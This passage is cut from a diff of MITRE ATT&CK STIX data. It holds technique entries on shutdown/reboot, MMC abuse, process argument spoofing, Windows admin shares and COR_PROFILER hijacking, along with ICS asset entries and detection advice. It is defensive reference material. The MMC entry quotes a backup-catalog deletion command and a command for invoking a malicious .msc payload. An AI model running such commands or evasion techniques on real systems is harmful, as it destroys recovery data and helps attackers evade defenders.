invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application Control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b", + "created": "2017-05-31T21:31:39.262Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1127", + "external_id": "T1127" + }, + { + "source_name": "Exploit Monday WinDbg", + "description": "Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017.", + "url": "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html" + }, + { + "source_name": "LOLBAS Tracker", + "description": "LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/" + }, + { + "source_name": "engima0x3 RCSI Bypass", + "description": "Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017.", + "url": "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/" + }, + { + "source_name": "engima0x3 DNX Bypass", + "description": "Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017.", + "url": "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "System Shutdown/Reboot", + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)\n\nShutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Austin Clark, @c2defense", + "Hubert Mank" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006. Unexpected or unauthorized commands from network cli on network devices may also be associated with shutdown/reboot, e.g. the reload command.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", + "created": "2019-10-04T20:42:28.541Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1529", + "external_id": "T1529" + }, + { + "source_name": "Talos Nyetya June 2017", + "description": "Chiu, A. (2016, June 27). New Ransomware Variant \"Nyetya\" Compromises Systems Worldwide. Retrieved March 26, 2019.", + "url": "https://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html" + }, + { + "source_name": "alert_TA18_106A", + "description": "CISA. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved February 14, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/TA18-106A" + }, + { + "source_name": "Talos Olympic Destroyer 2018", + "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", + "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html" + }, + { + "source_name": "Microsoft Shutdown Oct 2017", + "description": "Microsoft. (2017, October 15). Shutdown. Retrieved October 4, 2019.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-10-25T14:00:00.188Z", + "name": "MMC", + "description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)\n\nFor example, mmc C:\\Users\\foo\\admintools.msc /a will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is mmc gpedit.msc, which will open the Group Policy Editor application window. \n\nAdversaries may use MMC commands to perform malicious tasks. For example, mmc wbadmin.msc delete catalog -quiet deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: wbadmin.msc may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)\n\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the “Link to Web Address” snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc.(Citation: abusing_com_reg)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Wes Hurd" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line parameters for suspicious or malicious use of MMC. Since MMC is a signed Windows binary, verify use of MMC is legitimate and not malicious. \n\nMonitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as services.msc or eventvwr.msc. Invoking non-Microsoft .msc files may be an indicator of malicious activity. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Application control", + "Digital Certificate Validation" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407", + "created": "2021-09-28T01:36:41.638Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/014", + "external_id": "T1218.014" + }, + { + "source_name": "abusing_com_reg", + "description": "bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021.", + "url": "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/" + }, + { + "source_name": "mmc_vulns", + "description": "Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021.", + "url": "https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/" + }, + { + "source_name": "win_msc_files_overview", + "description": "Brinkmann, M.. (2017, June 10). Windows .msc files overview. Retrieved September 20, 2021.", + "url": "https://www.ghacks.net/2017/06/10/windows-msc-files-overview/" + }, + { + "source_name": "win_mmc", + "description": "Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc" + }, + { + "source_name": "win_wbadmin_delete_catalog", + "description": "Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved September 20, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog" + }, + { + "source_name": "win_clsid_key", + "description": "Microsoft. (2018, May 31). CLSID Key. Retrieved September 24, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm" + }, + { + "source_name": "what_is_mmc", + "description": "Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021.", + "url": "https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console" + }, + { + "source_name": "phobos_virustotal", + "description": "Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021.", + "url": "https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Process Argument Spoofing", + "description": "Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)\n\nAdversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) WriteProcessMemory() function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)\n\nAdversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)\n\nThis behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Detection of process argument spoofing may be difficult as adversaries may momentarily modify stored arguments used for malicious execution. These changes may bypass process creation detection and/or later process memory analysis. Consider monitoring for [Process Hollowing](https://attack.mitre.org/techniques/T1055/012), which includes monitoring for process creation (especially those in a suspended state) as well as access and/or modifications of these processes (especially by the parent process) via Windows API calls.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not and/or do no align with its logged command-line arguments.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1", + "created": "2021-11-19T14:13:11.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1564/010", + "external_id": "T1564.010" + }, + { + "source_name": "Microsoft PEB 2021", + "description": "Microsoft. (2021, October 6). PEB structure (winternl.h). Retrieved November 19, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb" + }, + { + "source_name": "Xpn Argue Like Cobalt 2019", + "description": "Chester, A. (2019, January 28). How to Argue like Cobalt Strike. Retrieved November 19, 2021.", + "url": "https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/" + }, + { + "source_name": "Cobalt Strike Arguments 2019", + "description": "Mudge, R. (2019, January 2). https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/. Retrieved November 19, 2021.", + "url": "https://blog.cobaltstrike.com/2019/01/02/cobalt-strike-3-13-why-do-we-argue/" + }, + { + "source_name": "Nviso Spoof Command Line 2020", + "description": "Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.", + "url": "https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/" + }, + { + "source_name": "FireEye FiveHands April 2021", + "description": "McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html" + }, + { + "source_name": "Mandiant Endpoint Evading 2019", + "description": "Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.", + "url": "https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Windows Admin Shares", + "description": "Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. \n\nAdversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1035), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1075) and certain configuration and patch levels. (Citation: Microsoft Admin Shares)\n\nThe [Net](https://attack.mitre.org/software/S0039) utility can be used to connect to Windows admin shares on remote systems using net use commands with valid credentials. (Citation: Technet Net Use)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne) (Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as [Net](https://attack.mitre.org/software/S0039), on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.(Citation: Medium Detecting Lateral Movement)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_system_requirements": [ + "File and printer sharing over SMB enabled.\nHost/network firewalls not blocking SMB ports between source and destination.\nUse of domain account in administrator group on remote system or default system admin account." + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ffe742ed-9100-4686-9e00-c331da544787", + "created": "2017-05-31T21:31:00.200Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1077", + "external_id": "T1077" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/561.html", + "external_id": "CAPEC-561" + }, + { + "source_name": "Wikipedia SMB", + "description": "Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.", + "url": "https://en.wikipedia.org/wiki/Server_Message_Block" + }, + { + "source_name": "TechNet RPC", + "description": "Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc787851.aspx" + }, + { + "source_name": "Microsoft Admin Shares", + "description": "Microsoft. (n.d.). How to create and delete hidden or administrative shares on client computers. Retrieved November 20, 2014.", + "url": "http://support.microsoft.com/kb/314984" + }, + { + "source_name": "Technet Net Use", + "description": "Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.", + "url": "https://technet.microsoft.com/bb490717.aspx" + }, + { + "source_name": "Lateral Movement Payne", + "description": "Payne, J. (2015, November 26). Tracking Lateral Movement Part One - Special Groups and Specific Service Accounts. Retrieved February 1, 2016.", + "url": "https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts" + }, + { + "source_name": "Windows Event Forwarding Payne", + "description": "Payne, J. (2015, November 23). Monitoring what matters - Windows Event Forwarding for everyone (even if you already have a SIEM.). Retrieved February 1, 2016.", + "url": "https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem" + }, + { + "source_name": "Medium Detecting Lateral Movement", + "description": "French, D. (2018, September 30). Detecting Lateral Movement Using Sysmon and Splunk. Retrieved October 11, 2019.", + "url": "https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "COR_PROFILER", + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)\n\nThe COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n\nAdversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jesse Brown, Red Canary" + ], + "x_mitre_detection": "For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", + "created": "2020-06-24T22:30:55.843Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/012", + "external_id": "T1574.012" + }, + { + "source_name": "Microsoft Profiling Mar 2017", + "description": "Microsoft. (2017, March 30). Profiling Overview. Retrieved June 24, 2020.", + "url": "https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/profiling/profiling-overview" + }, + { + "source_name": "Microsoft COR_PROFILER Feb 2013", + "description": "Microsoft. (2013, February 4). Registry-Free Profiler Startup and Attach. Retrieved June 24, 2020.", + "url": "https://docs.microsoft.com/en-us/previous-versions/dotnet/netframework-4.0/ee471451(v=vs.100)" + }, + { + "source_name": "RedCanary Mockingbird May 2020", + "description": "Lambert, T. (2020, May 7). Introducing Blue Mockingbird. Retrieved May 26, 2020.", + "url": "https://redcanary.com/blog/blue-mockingbird-cryptominer/" + }, + { + "source_name": "Red Canary COR_PROFILER May 2020", + "description": "Brown, J. (2020, May 7). Detecting COR_PROFILER manipulation for persistence. Retrieved June 24, 2020.", + "url": "https://redcanary.com/blog/cor_profiler-for-persistence/" + }, + { + "source_name": "Almond COR_PROFILER Apr 2019", + "description": "Almond. (2019, April 30). UAC bypass via elevated .NET applications. Retrieved June 24, 2020.", + "url": "https://offsec.almond.consulting/UAC-bypass-dotnet.html" + }, + { + "source_name": "GitHub OmerYa Invisi-Shell", + "description": "Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, 2020.", + "url": "https://github.com/OmerYa/Invisi-Shell" + }, + { + "source_name": "subTee .NET Profilers May 2017", + "description": "Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET Profilers. Retrieved June 24, 2020.", + "url": "https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-04T18:07:59.333Z", + "name": "Virtual Private Network (VPN) Server", + "description": "A VPN server is a device that is used to establish a secure network tunnel between itself and other remote VPN devices, including field VPNs. VPN servers can be used to establish a secure connection with a single remote device, or to securely bridge all traffic between two separate networks together by encapsulating all data between those networks. VPN servers typically support remote network services that are used by field VPNs to initiate the establishment of the secure VPN tunnel between the field device and server.", + "x_mitre_sectors": [ + "General" + ], + "x_mitre_related_assets": [ + { + "name": "Virtual Private Network (VPN) terminator", + "related_asset_sectors": [ + "General" + ], + "description": "A VPN terminator is a device performs the role of either a VPN client or server to support the establishment of VPN connection. (Citation: IEC February 2019)" + }, + { + "name": "Field VPN", + "related_asset_sectors": [ + "General" + ], + "description": "Field VPN are typically deployed at remote outstations and are used to create secure connections to VPN servers within data/control center environments. " + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "Embedded" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "created": "2023-09-28T15:13:07.950Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0011", + "external_id": "A0011" + }, + { + "source_name": "IEC February 2019", + "description": "IEC 2019, February Security for industrial automation and control systems - Part 4-2: Technical security requirements for IACS components Retrieved. 2020/09/25 ", + "url": "https://webstore.iec.ch/publication/34421" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-04T18:03:06.811Z", + "name": "Jump Host", + "description": "Jump hosts are devices used to support remote management sessions into ICS networks or devices. The system is used to access the ICS environment securely from external networks, such as the corporate network. The user must first remote into the jump host before they can access ICS devices. The jump host may be a customized Windows server using common remote access protocols (e.g., RDP) or a dedicated access management device. The jump host typically performs various security functions to ensure the authenticity of remote sessions, including authentication, enforcing access controls/permissions, and auditing all access attempts. ", + "x_mitre_sectors": [ + "General" + ], + "x_mitre_related_assets": [ + { + "name": "Intermediate System", + "related_asset_sectors": [ + "Electric" + ], + "description": "A Cyber Asset or collection of Cyber Assets performing access control to restrict Interactive Remote Access to only authorized users.(Citation: North American Electric Reliability Corporation June 2021)" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "Embedded" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "created": "2023-09-28T17:52:53.206Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0012", + "external_id": "A0012" + }, + { + "source_name": "North American Electric Reliability Corporation June 2021", + "description": "North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11 ", + "url": "https://www.nerc.com/pa/Stand/Glossary%20of%20Terms/Glossary_of_Terms.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-04T18:05:43.237Z", + "name": "Remote Terminal Unit (RTU)", + "description": "A Remote Terminal Unit (RTU) is a device that typically resides between field devices (e.g., PLCs, IEDs) and control/SCADA servers and supports various communication interfacing and data aggregation functions. RTUs are typically responsible for forwarding commands from the control server and the collection of telemetry, events, and alerts from the field devices. An RTU can be implemented as a dedicated embedded device, as software platform that runs on a hardened/ruggedized computer, or using a custom application program on a PLC.", + "x_mitre_sectors": [ + "Electric", + "Water and Wastewater", + "General" + ], + "x_mitre_related_assets": [], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Embedded", + "Windows", + "Linux" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "created": "2023-09-28T14:44:54.756Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/assets/A0004", + "external_id": "A0004" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-06-24T14:49:31.477Z", + "name": "Applications (O365)", + "description": "", + "x_mitre_sectors": [ + "General" + ], + "x_mitre_related_assets": [], + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_platforms": [ + "Cloud", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "type": "x-mitre-asset", + "spec_version": "2.1", + "id": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "created": "2024-05-30T15:27:47.148Z", + "created_by_ref": 